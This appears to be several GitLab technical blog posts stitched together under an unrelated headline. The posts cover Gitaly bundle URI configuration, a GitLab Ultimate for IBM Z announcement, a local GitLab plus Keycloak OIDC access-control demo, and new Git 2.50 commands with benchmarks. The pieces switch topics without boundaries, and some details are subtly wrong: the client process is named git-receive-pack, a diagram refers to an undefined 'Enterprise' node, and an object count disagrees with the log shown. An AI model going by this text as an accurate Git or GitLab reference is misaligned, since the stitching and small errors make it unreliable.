• AI-driven code analysis: The new frontier in code security

Bundle URI takes significant load off of Gitaly servers during clones by allowing Git to pre-download a bundled repository from object storage before calling the Gitaly servers to fetch the remaining objects.

Here is a graph that shows the difference between clones without and with bundle URI.

This graph shows the results of a small test we ran on an isolated GitLab installation, with Gitaly running on a machine with 2 CPUs. We wanted to test bundle URI with a large repository, so we pushed the GitLab repository to the instance. We also generated a bundle beforehand.

The big CPU spike is from when we performed a single clone of the GitLab repository with bundle URI disabled. It's quite noticeable. A little later, we turned on bundle URI and launched three concurrent clones of the GitLab repository. Sure enough, turning on bundle URI provides massive performance gain. We can't even distinguish the CPU usage of the three clones from normal usage.

Configure Gitaly to use bundle URI

To enable bundle URI on your GitLab installation, there are a couple of things you need to configure.

Create a cloud bucket

Bundles need to be stored somewhere. The ideal place is in a cloud storage bucket. Gitaly uses the gocloud.dev library to read and write from cloud storage. Any cloud storage solution supported by this library can be used. Once you have a cloud bucket URL, you can add it in the Gitaly configuration here:

[bundle_uri]
go_cloud_url = "<bucket-uri>"

It must be noted that Gitaly does not manage the lifecycle of the bundles stored in the bucket. To avoid cost issues, object lifecycle policies must be enabled on the bucket in order to delete unused or old objects.

Enable the feature flags

There are two feature flags to enable:

• gitaly_bundle_generation enables auto-generation of bundles.

• gitaly_bundle_uri makes Gitaly advertise bundle URIs when they are available (either manually created or auto-generated) and allows the user to manually generate bundles.

These feature flags can be enabled at-large on a GitLab installation, or per repository. See the documentation on how to enable a GitLab feature behind a feature flag.

How to generate bundles

Gitaly offers two ways for users to use bundle URI: a manual way and an auto-generated way.

Manual

It is possible to create a bundle manually by connecting over SSH with the Gitaly node that stores the repository you want to create a bundle for, and run the following command:

sudo -u git -- /opt/gitlab/embedded/bin/gitaly bundle-uri 
--config=<config-file>
--storage=<storage-name>
--repository=<relative-path>

This command will create a bundle for the given repository and store it into the bucket configured above. When a subsequent git clone request will reach Gitaly for the same repository, the bundle URI mechanism described above will come into play.

Auto-generated

Gitaly can also generate bundles automatically, using a heuristic to determine if it is currently handling frequent clones for the same repository.

The current heuristic keeps track of the number of times a git fetch request is issued for each repository. If the number of requests reaches a certain threshold in a given time interval, a bundle is automatically generated. Gitaly also keeps track of the last time it generated a bundle for a repository. When a new bundle should be regenerated, based on the threshold and interval, Gitaly looks at the last time a bundle was generated for the given repository. It will only generate a new bundle if the existing bundle is older than some maxBundleAge configuration. The old bundle is overwritten. There can only be one bundle per repository in cloud storage.

Using bundle URI

When a bundle exists for a repository, it can be used by the git clone command.

Cloning from your terminal

To clone a repository from your terminal, make sure your Git configuration enables bundle URI. The configuration can be set like so:

git config --global transfer.bundleuri true

To verify that bundle URI is used during a clone, you can run the git clone command with GIT_TRACE=1 and see if your bundle is being downloaded:

➜  GIT_TRACE=1 git clone https://gitlab.com/gitlab-org/gitaly
...
14:31:42.374912 run-command.c:667       trace: run_command: git-remote-https '<bundle-uri>'
...

Cloning during CI/CD pipelines

One scenario where using bundle URI would be beneficial is during a CI/CD pipeline, where each job needs a copy of the repository in order to run. Cloning a repository during a CI/CD pipeline is the same as cloning a repository from your terminal, except that the Git client in this case is the GitLab Runner. Thus, we need to configure the GitLab Runner in such a way that it can use bundle URI.

1. Update the helper-image

The first thing to do to configure the GitLab Runner is to overwrite the helper-image that your GitLab Runner instances use. The helper-image is the image that is used to run the process of cloning a repository before the job starts. To use bundle URI, the image needs the following:

• Git Version 2.49.0 or later

• GitLab Runner helper Version 18.1.0 or later

The helper-images can be found here. Select an image that corresponds to the OS distribution and the architecture you use for your GitLab Runner instances, and verify that the image satisfies the requirements.

At the time of writing, the alpine-edge-<arch>-v18.1.0* tag meets all requirements.

You can validate the image meets all requirements with:

docker run -it <image:tag>
$ git version ## must be 2.49.0 or newer
$ gitlab-runner-helper -v ## must be 18.0 or newer

If you do not find an image that meets the requirements, you can also use the helper-image as a base image and install the requirements yourself in a custom-built image that you can host on GitLab Container Registry.

Once you have found the image you need, you must configure your GitLab Runner instances to use it by updating your config.toml file:

[[runners]]
 (...)
 executor = "docker"
 [runners.docker]
    (...)
    helper_image = "image:tag" ## <-- put the image name and tag here

Once the configuration is changed, you must restart the runners for the new configuration to take effect.

2. Turn on the feature flag

Next, you must enable the FF_USE_GIT_NATIVE_CLONE GitLab Runner feature flags in your .gitlab-ci.yml file. To do that, simply add it as a variable and set to true :

variables:
  FF_USE_GIT_NATIVE_CLONE: "true"

The GIT_STRATEGY must also be set to clone, as Git bundle URI only works with clone commands.

How bundle URI works

When a user clones a repository with the git clone command, a process called git-receive-pack is launched on the client's machine. This process communicates with the remote repository's server (it can be over HTTP/S, SSH, etc.) and asks to start a git-upload-pack process. Those two processes then exchange information using the Git protocol (it must be noted that bundle URI is only supported with Git protocol v2). The capabilities both processes support and the references and objects the client needs are among the information exchanged. Once the Git server has determined which objects to send to the client, it must package them into a packfile, which, depending on the size of the data it must process, can consume a good amount of resources.

Where does bundle URI fit into this interaction? If bundle URI is advertised as a capability from the upload-pack process and the client supports bundle URI, the Git client will ask the server if it knows about any bundle URIs. The server sends those URIs back and the client downloads those bundles.

Here is a diagram that shows those interactions:

sequenceDiagram


    participant receive as Client


    participant upload as Server


    participant cloud as File server


    receive ->> upload: issue git-upload-pack


    upload -->> receive: list of server capabilities


    opt if bundle URI is advertised as a capability


    receive ->> upload: request bundle URI


    upload -->> receive: bundle URI


    receive ->> cloud: download bundle at URI


    cloud -->> receive: bundle file


    receive ->> receive: clone from bundle


    end


    receive ->> upload: requests missing references and objects


    upload -->> receive: packfile data

As such, Git bundle URI is a mechanism by which, during a git clone, a Git server can advertise the URI of a bundle for the repository being cloned by the Git client. When that is the case, the Git client can clone the repository from the bundle and request from the Git server only the missing references or objects that were not part of the bundle. This mechanism really helps to alleviate pressure from the Git server.

Alternatives

GitLab also has a feature Pack-objects cache. This feature works slightly differently than bundle URI. When the server packs objects together into a so-called packfile, this feature will keep that file in the cache. When another client needs the same set of objects, it doesn't need to repack them, but it can just send the same packfile again.

The feature is only beneficial when many clients request the exact same set of objects. In a repository that is quick-changing, this feature might not give any improvements. With bundle URI, it doesn't matter if the bundle is slightly out-of-date because the client can request missing objects after downloading the bundle and apply those changes on top. Also bundle URI in Gitaly stores the bundles on external storage, which the Pack-objects Cache stores them on the Gitaly node, so using the latter doesn't reduce network and I/O load on the Gitaly server.

Try bundle URI today

You can try the bundle URI feature in one of the following ways:

• Download a free, 60-day trial version of GitLab Ultimate.

• If you already run a self-hosted GitLab installation, upgrade to 18.1.

• If you can't upgrade to 18.1 at this time, download GitLab to a local machine.

Challenges of today's mainframe development

Enterprise organizations that use IBM Z systems for mission-critical workloads face challenges that conventional DevSecOps tools aren’t equipped to address. Cloud-native teams benefit from modern CI/CD pipelines, collaborative development, and automated testing. In contrast, mainframe teams are often left behind — stuck with outdated tools that lead to costly inefficiencies and operational silos.

Teams often resort to workarounds, such as SSH connections and manual file transfers, which create security vulnerabilities and audit difficulties. When compliance requirements are stringent, these improvised solutions become unacceptable risks. Meanwhile, organizations maintain expensive parallel toolchains, with legacy mainframe development tools carrying premium licensing costs while delivering limited functionality compared to modern alternatives.

This fragmentation creates two problems: slower delivery cycles and difficulty attracting developers who expect modern development experiences.

"GitLab Ultimate for IBM Z represents an important step in addressing a long-standing industry challenge. IDC research shows that mainframe developers often work with legacy tooling that contributes to delivery inefficiencies and makes it harder to attract new talent. With this offering, modern DevSecOps capabilities and unified workflows are brought directly to the mainframe. This empowers developers to work more collaboratively and efficiently, while helping organizations accelerate innovation and integrate mainframe development into broader digital transformation strategies." - Katie Norton, Research Manager, DevSecOps and Software Supply Chain Security at IDC

Unified development environments

True modernization means more than just updating mainframe development. It means creating a unified platform where mainframe, cloud-native, web, and mobile development teams collaborate seamlessly.

GitLab Ultimate for IBM Z enables developers to use consistent workflows whether they're deploying to z/OS, cloud, or on-premises infrastructure — knowledge transfers between teams instead of staying siloed. Organizations can modernize incrementally without business disruption, as legacy systems continue operating while teams adopt modern practices at their own pace.

As organizations pursue hybrid cloud strategies, GitLab provides the foundation for applications that span mainframe and cloud-native environments.

What is GitLab Ultimate for IBM Z?

GitLab Ultimate for IBM Z delivers native z/OS Runner support, enabling seamless CI/CD pipeline execution directly on your mainframe infrastructure. This GitLab-certified solution helps eliminate the need for complex workarounds while maintaining the security and reliability your enterprise applications demand.

The combination of GitLab's comprehensive DevSecOps platform with IBM's deep mainframe expertise creates something unique in the market: a certified solution that provides a true bridge between enterprise legacy systems and cloud-native innovation.

GitLab Ultimate for IBM Z capabilities

GitLab Ultimate for IBM Z provides enterprise teams with the tools they need to modernize mainframe development while preserving critical business systems.

Native z/OS Runner support helps eliminate security risks and scalability bottlenecks associated with remote connections, while accelerating delivery through CI/CD pipelines that execute directly where your mainframe code resides.

Unified Source Code Management modernizes your toolchain by replacing expensive legacy library managers with GitLab's searchable, version-controlled repository system, helping reduce licensing costs and maintenance overhead.

Seamless integration with IBM Developer for z/OS Enterprise Edition (IDzEE) delivers faster software releases through dependency-based builds, automated code scanning, and comprehensive debugging tools within familiar developer environments, enhancing both quality and security.

End-to-end visibility across mainframe and distributed environments provides comprehensive project management from planning to production, enabling automated DevOps workflows that help retain talent through modern, next-generation development tools.

Modernize your mainframe development environment today

GitLab Ultimate for IBM Z is available now for organizations ready to transform their mainframe development experience. To learn more, visit the GitLab and IBM partnership page.

To help our customers scale effectively, we developed the RBAC Accelerator — a modular, outcome-driven enablement program that supports large organizations in defining, enforcing, and scaling access policies across GitLab.

This foundation enables broader transformation. For example, the Secure SDLC Accelerator, built on top of the RBAC Accelerator, empowers customers to integrate compliance, security, and DevSecOps best practices into their workflows.

GitLab customer Lely, a major Dutch manufacturer of agricultural machines and robots, used this approach to migrate to GitLab Dedicated. Lely automated user provisioning via Azure AD using OpenID Connect (OIDC), enforced least-privilege policies, and created a scalable, reusable access model to support their future development initiatives.

In this guide, we’ll take you through a hands-on implementation example of GitLab + Keycloak + OIDC, covering everything from running the setup in a Docker environment to automating role mapping, designing a scalable group hierarchy, and aligning GitLab access controls with organizational structure and compliance goals.

This is a local demo setup intended for proof-of-concept purposes only.

Whether you’re just starting out or optimizing at scale, this modular foundation ensures you’re not just securing access — you’re enabling everything that comes next.

Getting started with access control planning

Before implementing any tooling, it’s essential to understand your access landscape.

Consider:

• What GitLab resources need protection (projects, groups, environments)?
• Who are your personas (Developers, Maintainers, Guests, etc.)?
• What organizational units (departments, cost centers) should govern access?
• How does your IdP structure (Keycloak) define users and roles?

Use this stage to draft your:

• Access control matrix
• GitLab group hierarchy (team- or product-based)
• Least privilege policy assumptions

Sample group hierarchy

graph TD
    Root["Root (Root Group)"]
    FirmwareTeam["Firmware-Team"]
    FirmwareDevelopers["Developers (GitLab Developer Role)"]
    FirmwareMaintainers["Maintainers (GitLab Maintainer Role)"]
    FirmwareReporters["Reporters (GitLab Reporter Role)"]
    HardwareTeam["Hardware-Team"]
    HardwareDevelopers["Developers"]
    SoftwareTeam["Software-Team"]
    SoftwareDevelopers["Developers"]
    SoftwareMaintainers["Maintainers"]
    SoftwareReporters["Reporters"]
    
    Enterprise --> FirmwareTeam
    Enterprise --> HardwareTeam
    Enterprise --> SoftwareTeam
    
    FirmwareTeam --> FirmwareDevelopers
    FirmwareTeam --> FirmwareMaintainers
    FirmwareTeam --> FirmwareReporters
    
    HardwareTeam --> HardwareDevelopers
    
    SoftwareTeam --> SoftwareDevelopers
    SoftwareTeam --> SoftwareMaintainers
    SoftwareTeam --> SoftwareReporters

Demo system setup: GitLab + Keycloak in a local Docker environment

Prerequisites

• Docker, Docker Compose, OpenSSL
• GitLab Version 17.7.3 and Keycloak Version 23.0.7 container images
• Self-signed certificates

.env configuration

The demo setup is using the following GitLab and Keycloak versions, ports and secrets.

GitLab configuration

GITLAB_VERSION=17.7.3-ee.0
GITLAB_EXTERNAL_URL=http://localhost:8081
GITLAB_SSH_PORT=8222

Keycloak configuration

KEYCLOAK_VERSION=latest
KEYCLOAK_ADMIN=<your-admin-username>
KEYCLOAK_ADMIN_PASSWORD=<your-admin-password>
KEYCLOAK_HTTPS_PORT=8443
KEYCLOAK_CLIENT_SECRET=<your-client-secret>  # Get this from Keycloak after setup

Generate SSL certificates

To establish trust between GitLab and Keycloak, especially in a self-hosted Docker environment, we’ll need to generate self-signed SSL certificates. These certificates will enable encrypted HTTPS communication and ensure GitLab can securely talk to Keycloak during the OIDC authentication process.

For production environments, we recommend using certificates from a trusted Certificate Authority (CA), but for local testing and development, self-signed certificates are sufficient.

Follow these step-by-step instructions:

1. Create a folder for the certificates.

mkdir -p certs

2. Generate a self-signed certificate with OpenSSL.

openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout certs/tls.key \
  -out certs/tls.crt \
  -subj "/CN=keycloak" \
  -addext "subjectAltName=DNS:keycloak,DNS:localhost"

3. Create a PKCS12 keystore for Keycloak.

openssl pkcs12 -export \
  -in certs/tls.crt \
  -inkey certs/tls.key \
  -out certs/keystore.p12 \
  -name keycloak \
  -password pass:password

Start the service using Docker compose

Now that we have our certificates, we can stand up our local GitLab + Keycloak environment using Docker Compose:

version: '3.8'
services:
  gitlab:
    image: gitlab/gitlab-ee:${GITLAB_VERSION}
    container_name: gitlab
    restart: unless-stopped
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url '${GITLAB_EXTERNAL_URL:-http://localhost:8081}'
        gitlab_rails['gitlab_shell_ssh_port'] = ${GITLAB_SSH_PORT:-8222}
        gitlab_rails['display_initial_root_password'] = true

        # OAuth Configuration
        gitlab_rails['omniauth_enabled'] = true
        gitlab_rails['omniauth_allow_single_sign_on'] = ['openid_connect']
        gitlab_rails['omniauth_block_auto_created_users'] = false
        gitlab_rails['omniauth_providers'] = [
            {
                'name' => 'openid_connect',
                'label' => 'Keycloak',
                'args' => {
                    'name' => 'openid_connect',
                    'scope' => ['openid', 'profile', 'email'],
                    'response_type' => 'code',
                    'issuer' => 'https://localhost:8443/realms/GitLab',
                    'client_auth_method' => 'query',
                    'discovery' => false,
                    'uid_field' => 'preferred_username',
                    'pkce' => true,
                    'client_options' => {
                        'identifier' => 'gitlab',
                        'secret' => '${KEYCLOAK_CLIENT_SECRET}',
                        'redirect_uri' => '${GITLAB_EXTERNAL_URL:-http://localhost:8081}/users/auth/openid_connect/callback',
                        'authorization_endpoint' => 'https://localhost:8443/realms/GitLab/protocol/openid-connect/auth',
                        'token_endpoint' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/token',
                        'userinfo_endpoint' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/userinfo',
                        'jwks_uri' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/certs'
                    }
                }
            }
        ]
    volumes:
      - gl-config:/etc/gitlab
      - gl-data:/var/opt/gitlab
      - ./certs/tls.crt:/etc/gitlab/trusted-certs/keycloak.crt
    ports:
      - '${GITLAB_EXTERNAL_PORT:-8081}:8081'
      - '${GITLAB_SSH_PORT:-8222}:22'
    shm_size: '256m'

  keycloak:
    image: quay.io/keycloak/keycloak:${KEYCLOAK_VERSION}
    container_name: keycloak-server
    restart: unless-stopped
    command: [
      "start-dev",
      "--import-realm",
      "--https-port=${KEYCLOAK_HTTPS_PORT}",
      "--https-key-store-file=/etc/x509/https/keystore.p12",
      "--https-key-store-password=password"
    ]
    volumes:
      - ./data:/opt/keycloak/data/import
      - ./certs:/etc/x509/https
    environment:
      KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN}
      KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD}
    ports:
      - "${KEYCLOAK_HTTPS_PORT}:8443"

volumes:
  gl-config:
  gl-data:

Run the docker-compose up -d command and your GitLab + Keycloak environment will be up in minutes.

docker-compose up -d

Keycloak realm configuration

Your Keycloak realm is automatically configured on startup as it's defined in the docker-compose file.

The realm configuration will include:

• Pre-configured GitLab client
• Default client secret

You can access Keycloak admin console at https://localhost:8443 with:

• Username: admin
• Password: from your .env file
• To verify the setup:
  • Log into Keycloak admin console
  • Select the GitLab realm
  • Check Clients > gitlab

Verify the client configuration matches your environment.

To showcase the automated RBAC mechanism, you will need to follow these steps:

• Map realm roles to GitLab roles
• Create group structure with mapping roles, matching the Group, Sub-group, Project pattern in GitLab.

Before provisioning your first users to the user groups, it’s recommended to log into your GitLab instance to retrieve your instance root password:

1. Access GitLab at http://localhost:8081.

2. Get the root password:

docker exec gitlab grep 'Password:' `/etc/gitlab/initial_root_password`

3. Log in as root with the retrieved password.

Putting it all together

To demonstrate the power of this integrated RBAC model, start by walking through a real-world user journey — from identity to access.

Begin in Keycloak by showcasing a user assigned to specific realm roles (e.g., developer, maintainer) and groups (e.g., /engineering/platform). These roles have been mapped to GitLab access levels via OIDC claims, while group affiliations align with GitLab’s structured hierarchy of root groups, sub-groups, and projects.

Upon login through GitLab’s SSO Keycloak endpoint, the user is automatically provisioned into the correct group and assigned the appropriate role — with no manual intervention.

Within GitLab, you can see that the user can interact with the assigned project: For example, a developer might push code and open a merge request, but not merge to protected branches — validating the least-privilege model.

Finally, you can showcase access across multiple teams or products that are managed centrally in Keycloak, yet enforced precisely in GitLab through group sync and permissions inheritance. This demo illustrates not just role assignment, but how GitLab and Keycloak together deliver real-time, automated access governance at scale — ready for secure, compliant, enterprise-grade software development.

Why GitLab?

GitLab’s comprehensive, intelligent DevSecOps platform is the ideal foundation for secure, scalable access management. With native OIDC support, granular role enforcement, SCIM-based user provisioning, and built-in audit logging, GitLab allows organizations to centralize control without compromising agility. Its flexible group hierarchy mirrors enterprise structure, making it easy to manage access across teams.

Integrating with identity providers like Keycloak automates onboarding, ensures least-privilege access, and creates a seamless identity-to-permission pipeline that supports regulatory and security goals. As a core component of GitLab’s security capabilities, RBAC ties directly into CI/CD, policy enforcement, and vulnerability management workflows.

Summary

RBAC is just the beginning. With GitLab and Keycloak, you’re not just securing access — you’re enabling structured, automated governance that scales. As you expand into policy enforcement, Secure SDLC, and DevSecOps automation, this foundation becomes a launchpad for sustainable, enterprise-grade software delivery.

Get started with RBAC in GitLab today with a free, 60-day trial of GitLab Ultimate. Sign up today!

New git-diff-pairs(1) command

Diffs are at the heart of every code review and show all the changes made between two revisions. GitLab shows diffs in various places, but the most common place is a merge request's "Changes" tab. Behind the scenes, diff generation is powered by git-diff(1). For example:

$ git diff HEAD~1 HEAD

This command returns the full diff for all changed files. This might pose a scalability challenge because the number of files changed between a set of revisions could be very large and cause the command to reach self-imposed timeouts for the GitLab backend. For large change sets, it would be better if there were a way to break diff computation into smaller, more digestible chunks.

One way this can be achieved is by using git-diff-tree(1) to retrieve info about all the changed files:

$ git diff-tree -r -M --abbrev HEAD~ HEAD
:100644 100644 c9adfed339 99acf81487 M      Documentation/RelNotes/2.50.0.adoc
:100755 100755 1047b8d11d 208e91a17f M      GIT-VERSION-GEN

Git refers to this output as the "raw" format. In short, each line of output lists filepairs and the accompanying metadata about what has changed between the start and end revisions. Compared to generating the "patch" output for large changes, this process is relatively quick and provides a summary of everything that changed. This command can optionally perform rename detection by appending the -M flag to check if identified changes were due to a file rename.

With this information, we could use git-diff(1) to compute each of the filepair diffs individually. For example, we can provide the blob IDs directly:

$ git diff 1047b8d11de767d290170979a9a20de1f5692e26 208e91a17f04558ca66bc19d73457ca64d5385f

We can repeat this process for each of the filepairs, but spinning up a separate Git process for each individual file diff is not very efficient. Furthermore, when using blob IDs, the diff loses some contextual information such as the change status, and file modes which are stored in with the parent tree object. What we really want is a mechanism to feed "raw" filepair info and generate the corresponding patch output.

With the 2.50 release, Git has a new built-in command named git-diff-pairs(1). This command accepts "raw" formatted filepair info as input on stdin to determine exactly which patches to output. The following example showcases how this command could be used:

$ git diff-tree -r -z -M HEAD~ HEAD | git diff-pairs -z

When used in this manner, the resulting output is identical to using git-diff(1). By having a separate command to generate patch output, the "raw" output from git-diff-tree(1) can be broken up into smaller batches of filepairs and fed to separate git-diff-pairs(1) processes. This solves the previously mentioned scalability concern because diffs no longer have to be computed all at once. Future GitLab releases could build upon this mechanism to improve diff generation performance, especially in cases where large change sets are concerned. For more information on this change, check out the corresponding mailing-list thread.

This project was led by Justin Tobler.

Batched reference updates

Git provides the git-update-ref(1) command to perform reference updates. When used with the --stdin flag, multiple reference updates can be batched together in a single transaction by specifying instructions for each reference update to be performed on stdin. Bulk updating references in this manner also provides atomic behavior whereby a single reference update failure results in an aborted transaction and no references being updated. Here is an example showcasing this behavior:

# Create repository with three empty commits and branch named "foo"
$ git init
$ git commit --allow-empty -m 1
$ git commit --allow-empty -m 2
$ git commit --allow-empty -m 3
$ git branch foo

# Print out the commit IDs
$ git rev-list HEAD
cf469bdf5436ea1ded57670b5f5a0797f72f1afc
5a74cd330f04b96ce0666af89682d4d7580c354c
5a6b339a8ebffde8c0590553045403dbda831518

# Attempt to create a new reference and update existing reference in transaction.
# Update is expected to fail because the specified old object ID doesn’t match.
$ git update-ref --stdin <<EOF
> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc
> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c
> EOF
fatal: cannot lock ref 'refs/heads/foo': is at cf469bdf5436ea1ded57670b5f5a0797f72f1afc but expected 5a74cd330f04b96ce0666af89682d4d7580c354c

# The "bar" reference was not created.
$ git switch bar
fatal: invalid reference: bar

Compared to updating many references individually, updating in bulk is also much more efficient. While this works well, there might be certain circumstances where it is okay for a subset of the requested reference updates to fail, but we still want to take advantage of the efficiency gains of bulk updates.

With this release, git-update-ref(1) has the new --batch-updates option, which allows the updates to proceed even when one or more reference updates fails. In this mode, individual failures are reported in the following format:

rejected SP (<old-oid> | <old-target>) SP (<new-oid> | <new-target>) SP <rejection-reason> LF

This allows successful reference updates to proceed while providing context to which updates were rejected and for what reason. Using the same example repository from the previous example:

# Attempt to create a new reference and update existing reference in transaction.
$ git update-ref --stdin --batch-updates <<EOF
> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc
> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c
> EOF
rejected refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c incorrect old value provided

# The "bar" reference was created even though the update to "foo" was rejected.
$ git switch bar
Switched to branch 'bar'

This time, with the --batch-updates option, the reference creation succeeded even though the update didn't work. This patch series lays the groundwork for future performance improvements in git-fetch(1) and git-receive-pack(1) when references are updated in bulk. For more information, check the mailing-list thread

This project was led by Karthik Nayak.

New filter option for git-cat-file(1)

With git-cat-file(1), it is possible to print info for all objects contained in the repository via the --batch–all-objects option. For example:

# Setup simple repository.
$ git init
$ echo foo >foo
$ git add foo
$ git commit -m init

# Create an unreachable object.
$ git commit --amend --no-edit

# Use git-cat-file(1) to print info about all objects including unreachable objects.
$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)'
commit 0b07e71d14897f218f23d9a6e39605b466454ece
tree 205f6b799e7d5c2524468ca006a0131aa57ecce7
blob 257cc5642cb1a054f08cc83f2d943e56fd3ebe99
commit c999f781fd7214b3caab82f560ffd079ddad0115

In some situations, a user might want to search through all objects in the repository, but only output a subset based on some specified attribute. For example, if we wanted to see only the objects that are commits, we could use grep(1):

$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' | grep ^commit
commit 0b07e71d14897f218f23d9a6e39605b466454ece
commit c999f781fd7214b3caab82f560ffd079ddad0115

While this works, one downside with filtering the output is that git-cat-file(1) still has to traverse all the objects in the repository, even the ones that the user is not interested in. This can be rather inefficient.

With this release, git-cat-file(1) now has the --filter option, which only shows objects matching the specified criteria. This is similar to the option of the same name for git-rev-list(1), but with only a subset of the filters supported. The supported filters are blob:none, blob:limit=, as well as object:type=. Similar to the previous example, objects can be filtered by type with Git directly:

$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' --filter='object:type=commit'
commit 0b07e71d14897f218f23d9a6e39605b466454ece
commit c999f781fd7214b3caab82f560ffd079ddad0115

Not only is it convenient for Git to handle the processing, for large repositories with many objects, it is also potentially more efficient. If a repository has bitmap indices, it becomes possible for Git to efficiently lookup objects of a specific type, and thus avoid scanning through the packfile, which leads to a significant speedup. Benchmarks conducted on the Chromium repository show significant improvements:

Benchmark 1: git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter
   Time (mean ± σ):     82.806 s ±  6.363 s    [User: 30.956 s, System: 8.264 s]
   Range (min … max):   73.936 s … 89.690 s    10 runs

Benchmark 2: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag
   Time (mean ± σ):      20.8 ms ±   1.3 ms    [User: 6.1 ms, System: 14.5 ms]
   Range (min … max):    18.2 ms …  23.6 ms    127 runs

Benchmark 3: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit
   Time (mean ± σ):      1.551 s ±  0.008 s    [User: 1.401 s, System: 0.147 s]
   Range (min … max):    1.541 s …  1.566 s    10 runs

Benchmark 4: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree
   Time (mean ± σ):     11.169 s ±  0.046 s    [User: 10.076 s, System: 1.063 s]
   Range (min … max):   11.114 s … 11.245 s    10 runs

Benchmark 5: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob
   Time (mean ± σ):     67.342 s ±  3.368 s    [User: 20.318 s, System: 7.787 s]
   Range (min … max):   62.836 s … 73.618 s    10 runs

Benchmark 6: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none
   Time (mean ± σ):     13.032 s ±  0.072 s    [User: 11.638 s, System: 1.368 s]
   Range (min … max):   12.960 s … 13.199 s    10 runs

Summary
   git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag
    74.75 ± 4.61 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit
   538.17 ± 33.17 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree
   627.98 ± 38.77 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none
  3244.93 ± 257.23 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob
  3990.07 ± 392.72 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter

Interestingly, these results indicate that the computation time now scales with the number of objects for a given type instead of the number of total objects in the packfile. The original mailing-list thread can be found here.

This project was led by Patrick Steinhardt.

Improved performance when generating bundles

Git provides a means to generate an archive of a repository which contains a specified set of references and accompanying reachable objects via the git-bundle(1) command. This operation is used by GitLab to generate repository backups and also as part of the bundle-URI mechanism.

For large repositories containing millions of references, this operation can take hours or even days. For example, with the main GitLab repository (gitlab-org/gitlab), backup times were around 48 hours. Investigation revealed there was a performance bottleneck due to how Git was performing a check to avoid duplicated references being included in the bundle. The implementation used a nested for loop to iterate and compare all listed references, leading to O(N^2) time complexity. This scales very poorly as the number of references in a repository increases.

In this release, this issue was addressed by replacing the nested loops with a map data structure leading to a significant speedup. The following benchmark the performance improvement for creating a bundle with a repository containing 100,000 references:

Benchmark 1: bundle (refcount = 100000, revision = master)
  Time (mean ± σ):     14.653 s ±  0.203 s    [User: 13.940 s, System: 0.762 s]
  Range (min … max):   14.237 s … 14.920 s    10 runs

Benchmark 2: bundle (refcount = 100000, revision = HEAD)
  Time (mean ± σ):      2.394 s ±  0.023 s    [User: 1.684 s, System: 0.798 s]
  Range (min … max):    2.364 s …  2.425 s    10 runs

Summary
  bundle (refcount = 100000, revision = HEAD) ran
    6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)

To learn more, check out our blog post How we decreased GitLab repo backup times from 48 hours to 41 minutes. You can also find the original mailing list thread here.

This project was led by Karthik Nayak.

Better bundle URI unbundling

Through the bundle URI mechanism in Git, locations to fetch bundles from can be provided to clients with the goal to help speed up clones and fetches. When a client downloads a bundle, references under refs/heads/* are copied from the bundle into the repository along with their accompanying objects. A bundle might contain additional references outside of refs/heads/* such as refs/tags/*, which are simply ignored when using bundle URI on clone.

In Git 2.50, this restriction is lifted, and all references matching refs/* contained in the downloaded bundle are copied. Scott Chacon, who contributed this functionality, demonstrates the difference when cloning gitlab-org/gitlab-foss:

$ git-v2.49 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.49
Cloning into 'gl2.49'...
remote: Enumerating objects: 1092703, done.
remote: Counting objects: 100% (973405/973405), done.
remote: Compressing objects: 100% (385827/385827), done.
remote: Total 959773 (delta 710976), reused 766809 (delta 554276), pack-reused 0 (from 0)
Receiving objects: 100% (959773/959773), 366.94 MiB | 20.87 MiB/s, done.
Resolving deltas: 100% (710976/710976), completed with 9081 local objects.
Checking objects: 100% (4194304/4194304), done.
Checking connectivity: 959668, done.
Updating files: 100% (59972/59972), done.

$ git-v2.50 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.50
Cloning into 'gl-2.50'...
remote: Enumerating objects: 65538, done.
remote: Counting objects: 100% (56054/56054), done.
remote: Compressing objects: 100% (28950/28950), done.
remote: Total 43877 (delta 27401), reused 25170 (delta 13546), pack-reused 0 (from 0)
Receiving objects: 100% (43877/43877), 40.42 MiB | 22.27 MiB/s, done.
Resolving deltas: 100% (27401/27401), completed with 8564 local objects.
Updating files: 100% (59972/59972), done.

Comparing these results, we see that Git 2.50 fetches 43,887 objects (40.42 MiB) after the bundle was extracted whereas Git 2.49 fetches a total of 959,773 objects (366.94 MiB). Git 2.50 fetches roughly 95% fewer objects and 90% less data, which benefits both the client and the server. The server needs to process a lot less data to the client and the client needs to download and extract less data. In the example provided by Scott this led to a speedup of 25%.

To learn more, check out the corresponding mailing-list thread.

